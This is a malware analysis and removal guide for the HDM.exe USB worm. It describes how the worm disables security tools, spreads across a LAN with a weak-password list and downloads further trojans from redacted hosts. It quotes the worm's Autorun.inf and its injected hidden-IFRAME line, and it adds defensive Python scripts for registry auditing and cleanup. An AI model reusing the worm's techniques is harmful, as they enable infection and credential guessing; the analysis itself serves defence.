HDM.exe: manual removal of a USB-disk virus

Source: Internet
Author: User

HDM.exe is a destructive USB-disk worm. Its damage falls mainly into the following areas:


Quote:
1. Restores the SSDT to disable antivirus hooks
2. IFEO image hijacking
3. Closes windows whose titles match a keyword list
4. Deletes .gho (Ghost backup) files
5. Breaks Safe Mode and the "Show hidden files" option
6. Infects HTM and other web files
7. Spreads across the LAN by guessing passwords
8. Spreads via USB disks and other removable storage
9. ARP spoofing


The detailed analysis follows:


Quote:
File: HDM.exe
Size: 13312 bytes
Modified: 2007-11-28 16:52:08
MD5: 7ec36fa2bcfc1ea72c26b74c928c78f6
SHA1: b60048a8f9db67edf4b94bfe4da2a1906cd33b59
CRC32: 88d8970a


Technical details:

1. When run, the virus drops the following files and copies of itself:


Quote:
C:\WINDOWS\system32\Winlogon.dll
C:\RESSDT.sys


It traverses every disk partition and writes HDM.exe plus an Autorun.inf into each root directory, which is how it spreads via USB disks and other removable storage.

At the same time it creates a service named RESSDT:
Startup type: Manual
Image path: C:\RESSDT.sys
Display name: RESSDT

Once this driver is loaded it restores the SSDT, which removes the kernel API hooks that some antivirus products depend on.

2. Drops getip.bat into the virus's directory to obtain the local IP address.

3. Uses ping to find other hosts on the same network segment and writes the results to C:\EnumHost.txt.

4. For each host it finds on the segment, it tries to copy HDM.exe to the root of that host's C, D, E and F drives, authenticating with the following user names and passwords:

Quote:
Home
Movie
Alex
Love
Xp
123
Administrator
New
Guest
User
Game
Time
Yeah
Money
Xpuser

123456
Qwerty
abc123
Memory
12345678
88888
5201314
1314520
Asdfgh
Angel
Asdf
Baby
Woaini



It then obtains the target machine's current time and uses the at command to schedule the virus to run there.

5. Gets the system directory and downloads http://*/arp.exe and http://*/winpcap.exe into it.
Winpcap.exe installs the packet-capture (sniffer) library that the ARP tool needs.
Arp.exe performs ARP spoofing: it can inject an IFRAME pointing at http://www.*/wm.htm into the port-80 (HTTP) traffic of other machines on the LAN.

6. Traverses the html, htm, asp, aspx, php and jsp files on every partition and appends
<iframe src=http://www.*/wm.htm width=0 height=0></iframe>
to the end of each one.

7. Traverses every partition and deletes .gho files.

8. Adds entries under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ for the following security tools; each entry's Debugger value points at C:\HDM.exe, so starting any of these programs launches the virus instead:

Quote:
360rpt.exe
360Safe.exe
360tray.exe
Adam.exe
AgentSvr.exe
AppSvc32.exe
Autoruns.exe
Avgrssvc.exe
AvMonitor.exe
Avp.com
Avp.exe
CCenter.exe
CcSvcHst.exe
FileDsty.exe
FrameworkServices.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
Iparmo.exe
Iparmor.exe
IsPwdSvc.exe
Kabaload.exe
Kascrscn.scr
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
Kmp.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
Krepair.com
KsLoader.exe
Kvcenter.kxp
KvDetect.exe
KvfwMcl.exe
Kvmonxp.kxp
Kvmonxp_1.kxp
Kvol.exe
Kvolself.exe
Kvreport.kxp
Kvscan.kxp
KVSrvXP.exe
Kvstub.kxp
Kvupload.exe
Kvwsc.exe
Kvxp.kxp
Kvxp_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
Loaddll.exe
MagicSet.exe
Mcconsol.exe
Mcshield.exe
Mmqczj.exe
Mmsk.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
NaPrdMgr.exe
NAVSetup.exe
Nod32krn.exe
Nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
Regedit.exe
Rfwcfg.exe
RfwMain.exe
RfwProxy.exe
Rfwsrv.exe
RsAgent.exe
Rsaupd.exe
Runiep.exe
Safelive.exe
Scan32.exe
Shcfg32.exe
Shstat.exe
SmartUp.exe
SREng.exe
SWEEP95.exe
Symlcsvc.exe
SysSafe.exe
Tbmon.exe
TBSCAN.exe
TERegPct.exe
TrojanDetector.exe
Trojanwall.exe
Trojdie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpdateUI.exe
UpLive.EXE.exe
VsTskMgr.exe
WEBSCANX.exe
WoptiClean.exe
ZONEALARM.exe
Zxsweep.exe
_avp32.exe
_AVPCC.exe
_AVPM.exe


9. Modifies CheckedValue under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL so that the "Show hidden files and folders" option no longer takes effect. On a clean Windows XP system this value is a REG_DWORD equal to 1; worms typically set it to 0 or change its type to REG_SZ, so check both the type and the data when repairing it.

10. Deletes the SYSTEM\CurrentControlSet\Control\SafeBoot\Network
and SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal keys,
which breaks Safe Mode.

11. Looks for windows whose titles contain any of the following words and closes them:

Quote:
Safeguard
Scan
Removal tool
Registry
Process
Process
Poison
Trojan
Defense
Firewall
Virus
Detection
Firewall
Virus
Anti
Jinshan
Jiangmin
Kaspersky
Worm
Antivirus


12. Launches C:\Program Files\Internet Explorer\iexplore.exe to download further trojans:
http://www.*/1.exe through http://www.*/6.exe
are saved in the Temp folder as Downfile.exe through Downfile5.exe.
1.exe is itself a downloader that can fetch many more trojans, but in testing none of them installed successfully.

13. Also adds a registry entry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
<calc.exe><%SystemRoot%\system32\calc.exe>, which starts calc.exe at boot; its purpose is unclear.

14. Adds a Winlogon notification package under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon:
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

15. The virus body contains the strings "nofixups!" and "Just test!".
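The registry changes in items 8, 9, 10, 13 and 14 can be audited from a regedit export instead of being hunted by hand. The Python below is an added example, not part of the original analysis and not code from SREng or XDelBox: it parses `.reg` text, flags IFEO Debugger values that are not a known debugger, Run entries and Winlogon Notify packages that reference the file names this analysis attributes to HDM.exe, a SHOWALL CheckedValue that is not REG_DWORD 1, and a SafeBoot branch that has lost its Minimal or Network key. The sample export, the debugger allowlist and the IOC file-name set are constructed assumptions for the demonstration.

```python
"""Audit a regedit (.reg) export for the persistence and sabotage tricks
described above. Added example; the sample export below is constructed."""
import re

# File names the analysis above attributes to HDM.exe and its payloads.
IOC_FILES = {"hdm.exe", "ressdt.sys", "winlogon.dll", "server.exe",
             "smbins.sys", "smbins.dll", "insert.dll", "comint32.sys"}
# Assumed allowlist: programs that legitimately appear as an IFEO "Debugger".
KNOWN_DEBUGGERS = {"ntsd.exe", "cdb.exe", "windbg.exe", "vsjitdebugger.exe", "drwtsn32.exe"}

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
NOTIFY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
SHOWALL = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
SAFEBOOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"

_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def parse_reg(text):
    """Parse 'Windows Registry Editor Version 5.00' text into {key: {value name: raw data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor"):
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            keys[current]["@" if m.group(2) else m.group(1)] = m.group(3)
    return keys


def reg_string(raw):
    """Unescape a quoted REG_SZ ("C:\\\\HDM.exe" -> C:\\HDM.exe); other types come back verbatim."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw


def basename(path):
    return path.strip('"').replace("/", "\\").split("\\")[-1].lower()


def audit(reg_text):
    """Return (finding, item, data) tuples for everything worth a second look."""
    keys = parse_reg(reg_text)
    by_lower = {k.lower(): k for k in keys}
    findings = []
    for key, values in keys.items():
        leaf, vals = key.rsplit("\\", 1)[-1], {n.lower(): v for n, v in values.items()}
        if key.lower().startswith(IFEO.lower() + "\\") and "debugger" in vals:
            target = reg_string(vals["debugger"])
            if basename(target) not in KNOWN_DEBUGGERS:
                findings.append(("IFEO hijack", leaf, target))
        elif key.lower() == RUN.lower():
            for name, raw in values.items():
                if basename(reg_string(raw)) in IOC_FILES:
                    findings.append(("Run autostart (known IOC)", name, reg_string(raw)))
        elif key.lower().startswith(NOTIFY.lower() + "\\") and "dllname" in vals:
            dll = reg_string(vals["dllname"])
            # Stock XP packages register a bare file name; a full path or an IOC name needs review.
            if "\\" in dll or basename(dll) in IOC_FILES:
                findings.append(("Winlogon Notify package", leaf, dll))
    if SHOWALL.lower() in by_lower:
        vals = {n.lower(): v for n, v in keys[by_lower[SHOWALL.lower()]].items()}
        checked = vals.get("checkedvalue", "<missing>")
        if checked.lower() != "dword:00000001":  # clean XP value is REG_DWORD 1
            findings.append(("SHOWALL CheckedValue tampered", "CheckedValue", checked))
    if SAFEBOOT.lower() in by_lower:  # only judge SafeBoot when that branch was exported
        for sub in ("Minimal", "Network"):
            if (SAFEBOOT + "\\" + sub).lower() not in by_lower:
                findings.append(("SafeBoot key missing", sub, ""))
    return findings


# Constructed export mirroring the SREng log in this analysis (not a real machine's registry).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="C:\\HDM.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"calc.exe"="%SystemRoot%\\system32\\calc.exe"
"Cifmon"="C:\\WINDOWS\\system32\\Server.EXE"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon]
"DLLName"="C:\\WINDOWS\\system32\\Winlogon.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
"DLLName"="crypt32.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="cmd.exe"
"""

if __name__ == "__main__":
    for kind, item, data in audit(SAMPLE_REG):
        print(f"{kind:31} {item:14} {data}")
```

A real export written by regedit is UTF-16 with a BOM, so read it with `open(path, encoding="utf-16")` before passing the text to `audit`. The Run-key check only reports file names already tied to this worm; treat every other Run entry as something to review by hand, as the log's calc.exe entry shows.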

The SREng log taken after the virus and its trojans were installed is as follows:
Startup items


Quote:
Registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<calc.exe><%SystemRoot%\system32\calc.exe> [(verified) Microsoft Windows Publisher]
<Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\notify\winlogon]
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
<IFEO[360rpt.exe]><C:\HDM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe]
<IFEO[360Safe.exe]><C:\HDM.exe> [] ...

==================================
Drivers
[RAS Asynchronous Media Driver/asyncmac] [Stopped/Auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[Ms/ms] [Stopped/Manual Start]
<\??\c:\docume~1\newcen~1\locals~1\temp\tmp13.tmp><N/A>
[RESSDT/RESSDT] [Stopped/Manual Start]
<\??\c:\ressdt.sys><N/A>
[Usbmouseb/usbmouseb] [Running/Manual Start]
<\??\c:\windows\system32\drivers\smbins.sys><N/A>
==================================
Running processes
[PID:1148] [C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\Insert.dll] [N/A,]
[PID:1428] [C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\SYSTEM32\smbins.dll] [Microsoft Corporation, 5, 0, 2195, 3649]
==================================
Autorun.inf
[C:\]
[AutoRun]
open=hdm.exe
shell\open=Open(&O)
shell\open\Command=hdm.exe
shell\open\Default=1
shell\explore=Explorer(&X)
shell\explore\Command=hdm.exe
[D:\]
[AutoRun]
open=hdm.exe
shell\open=Open(&O)
shell\open\Command=hdm.exe
shell\open\Default=1
shell\explore=Explorer(&X)
shell\explore\Command=hdm.exe


Some of the trojans did not install successfully, so they do not appear in the log.

Removal procedure:

Download SREng and XDelBox.

1. Extract all of the XDelBox files into a folder.
In the box next to Add, enter each of the following paths one at a time:
%systemroot%\system32\drivers\comint32.sys
%systemroot%\system32\server.exe
%systemroot%\system32\winlogon.dll
C:\RESSDT.sys
%systemroot%\system32\drivers\smbins.sys
%systemroot%\system32\insert.dll
%systemroot%\system32\smbins.dll
After each entry, the file appears in the large box below.
Then select all of the files in the large box (hold down Ctrl),
right-click and choose "Reboot Delete Now".

Uninstall the WinPcap software.

2. After the computer restarts,
open SREng.
Under Startup Items > Registry, delete the following entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<calc.exe><%SystemRoot%\system32\calc.exe> [(verified) Microsoft Windows Publisher]
<Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\notify\winlogon]
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []
Delete all IFEO entries shown in red.

Under Startup Items > Services > Driver, tick "Hide certified Microsoft items",
select the following entries, click "Delete Service", click "Set", and click "No" in the pop-up box (note that "RAS Asynchronous Media Driver/asyncmac" is a legitimate service name whose image path the worm has redirected from the genuine asyncmac.sys to comint32.sys):

Quote:
[RAS asynchronous Media Driver/asyncmac] [Stopped/auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[Ms/ms] [Stopped/manual Start]
<\?? \c:\docume~1\newcen~1\locals~1\temp\tmp13.tmp><n/a>
[RESSDT/RESSDT] [Stopped/manual Start]
<\?? \c:\ressdt.sys><n/a>
[Usbmouseb/usbmouseb] [Running/manual Start]
<\?? \c:\windows\system32\drivers\smbins.sys><n/a>


Under System Repair > Windows Shell/IE, click Select All and then Repair.
Under System Repair > Advanced Repair, click Repair Safe Mode.

Double-click My Computer, then Tools > Folder Options > View; select "Show hidden files and folders" and clear the "Hide protected operating system files (Recommended)" check box. When prompted to confirm the change, click Yes, then OK.
Click the Folders button below the menu bar (to the right of Search).
In the left-hand Explorer pane, open each disk partition in turn
and delete the HDM.exe and Autorun.inf in its root directory.
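The Autorun.inf recorded in the SREng log above is what makes double-clicking or right-clicking a drive run the worm, and this step ends by deleting that file from every partition root. As an added example (not the original author's code and not part of SREng or XDelBox), the Python below parses an Autorun.inf, maps each Explorer action to the command it launches, and reports executables that run straight from the drive root, which is the pattern this worm leaves; `scan_roots` applies the same check to a list of drive roots. The worm sample is the log's Autorun.inf re-typed with English menu captions, and the benign CD-style sample is constructed for comparison.

```python
"""Parse Autorun.inf and report which Explorer actions it hijacks.
Added example; the samples below are re-typed from the log above / constructed."""
import os

# The worm's Autorun.inf as shown in the SREng log, with English menu captions.
SAMPLE = """[AutoRun]
open=hdm.exe
shell\\open=Open(&O)
shell\\open\\Command=hdm.exe
shell\\open\\Default=1
shell\\explore=Explorer(&X)
shell\\explore\\Command=hdm.exe
"""
# A benign CD-style Autorun.inf for comparison (constructed): runs a setup from a subfolder.
BENIGN = """[autorun]
open=setup\\setup.exe /autorun
icon=setup\\app.ico
"""

RUNNABLE = (".exe", ".com", ".bat", ".scr", ".pif")


def parse_autorun(text):
    """Return {section: {key: value}}; section and key names are lowercased because
    Windows treats them case-insensitively, values are kept verbatim."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def executed_targets(text):
    """Map each Explorer action (AutoPlay, double-click, context-menu verbs) to its command line."""
    ar = parse_autorun(text).get("autorun", {})
    targets = {}
    if "open" in ar:
        targets["open (AutoPlay / double-click)"] = ar["open"]
    if "shellexecute" in ar:
        targets["shellexecute (AutoPlay)"] = ar["shellexecute"]
    for key, value in ar.items():
        parts = key.split("\\")
        if len(parts) == 3 and parts[0] == "shell" and parts[2] == "command":
            caption = ar.get("shell\\" + parts[1], parts[1])  # menu text the user actually sees
            targets["context-menu verb '%s'" % caption] = value
    return targets


def root_executables(text):
    """Executables the Autorun.inf runs straight from the drive root (no directory component)."""
    found = set()
    for cmd in executed_targets(text).values():
        exe = cmd.split()[0].strip('"').lower() if cmd.strip() else ""
        if exe and "\\" not in exe and "/" not in exe and exe.endswith(RUNNABLE):
            found.add(exe)
    return found


def scan_roots(roots):
    """For each root holding an autorun.inf, return (root, sorted root executables, actions)."""
    report = []
    for root in roots:
        path = os.path.join(root, "autorun.inf")
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            report.append((root, sorted(root_executables(text)), executed_targets(text)))
    return report


if __name__ == "__main__":
    for action, cmd in executed_targets(SAMPLE).items():
        print(f"{action:40} -> {cmd}")
    print("root executables:", sorted(root_executables(SAMPLE)))
    # On Windows, check every partition root the way the step above does by hand.
    for root, exes, _ in scan_roots([f"{d}:\\" for d in "CDEFGH"]):
        print(f"{root} autorun.inf runs {exes or 'nothing from the root'}")
```

Every action in the worm's file (AutoPlay, the "Open" verb and the "Explore" verb) resolves to hdm.exe, so even a user who avoids double-clicking and picks Explore from the context menu still runs it. An autorun.inf on a fixed disk partition is itself abnormal; on removable media, one whose commands point at a bare executable in the root rather than a subfolder deserves the same suspicion.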

3. Repairing infected web files

Iframkill is recommended.
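Item 6 above describes the infection (a zero-size IFRAME appended to every web file) and this step recommends Iframkill to undo it. The Python below is an added example, not Iframkill and not the original author's code: it finds IFRAMEs declared with width=0 and height=0 regardless of attribute order or quoting, reports their src, strips them, and can walk a web root in dry-run mode before writing anything. The sample page is constructed, and the example.invalid host stands in for the redacted http://www.*/wm.htm.

```python
"""Find and strip zero-size IFRAMEs of the kind appended to web files by HDM.exe.
Added example; the sample page below is constructed."""
import os
import re

WEB_EXTS = {".html", ".htm", ".asp", ".aspx", ".php", ".jsp"}

# An <iframe> whose attributes include width=0 and height=0 (any order, quoted or not,
# optionally "0px"), plus its closing tag if present. Matches the injected form
# <iframe src=http://www.*/wm.htm width=0 height=0></iframe>.
HIDDEN_IFRAME = re.compile(
    r"""<iframe\b(?=[^>]*\bwidth\s*=\s*["']?0+(?:px)?\b)(?=[^>]*\bheight\s*=\s*["']?0+(?:px)?\b)"""
    r"""[^>]*>(?:\s*</iframe\s*>)?""",
    re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def find_hidden_iframes(html):
    """Return the src of every zero-size iframe in the text ('' if it has none)."""
    out = []
    for m in HIDDEN_IFRAME.finditer(html):
        s = SRC_ATTR.search(m.group(0))
        out.append(s.group(1) if s else "")
    return out


def strip_hidden_iframes(html):
    """Remove every zero-size iframe; returns (cleaned text, number removed)."""
    return HIDDEN_IFRAME.subn("", html)


def clean_tree(root, dry_run=True):
    """Walk a web root; return (path, count, srcs) per infected file and rewrite it unless dry_run.
    Files are read and written byte-transparently so non-UTF-8 pages are not corrupted."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="surrogateescape", newline="") as fh:
                html = fh.read()
            srcs = find_hidden_iframes(html)
            if not srcs:
                continue
            cleaned, n = strip_hidden_iframes(html)
            results.append((path, n, srcs))
            if not dry_run:
                with open(path, "w", encoding="utf-8", errors="surrogateescape", newline="") as fh:
                    fh.write(cleaned)
    return results


# Constructed infected page: a legitimate visible iframe plus the appended hidden one.
SAMPLE_PAGE = (
    "<html><body>\n<p>Downloads</p>\n"
    '<iframe src="http://example.invalid/player.htm" width="640" height="480"></iframe>\n'
    "</body></html>\n"
    "<iframe src=http://www.example.invalid/wm.htm width=0 height=0></iframe>"
)

if __name__ == "__main__":
    print("hidden iframes:", find_hidden_iframes(SAMPLE_PAGE))
    cleaned, n = strip_hidden_iframes(SAMPLE_PAGE)
    print(f"removed {n}; cleaned page:\n{cleaned}")
    # Dry-run over a web root first; rerun with dry_run=False once the src list looks right:
    # for path, n, srcs in clean_tree(r"C:\Inetpub\wwwroot"): print(path, n, srcs)
```

Run `clean_tree` in dry-run mode first and read the src list: zero-size frames are occasionally used legitimately by older web applications, so confirm that every reported src is the injected one before rewriting files, and restore from a clean backup where one exists rather than editing in place.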

At the time of writing, no antivirus product detected this virus.

Because this is a particularly destructive virus and an outbreak would have serious consequences, take the following precautions against similar threats:
1. Apply all system patches, keep antivirus software and firewalls up to date, and enable real-time monitoring.
2. Set a strong password for the system (the list above shows how weak the passwords such worms try are).
3. Disable AutoPlay to block viruses that spread via USB disks.
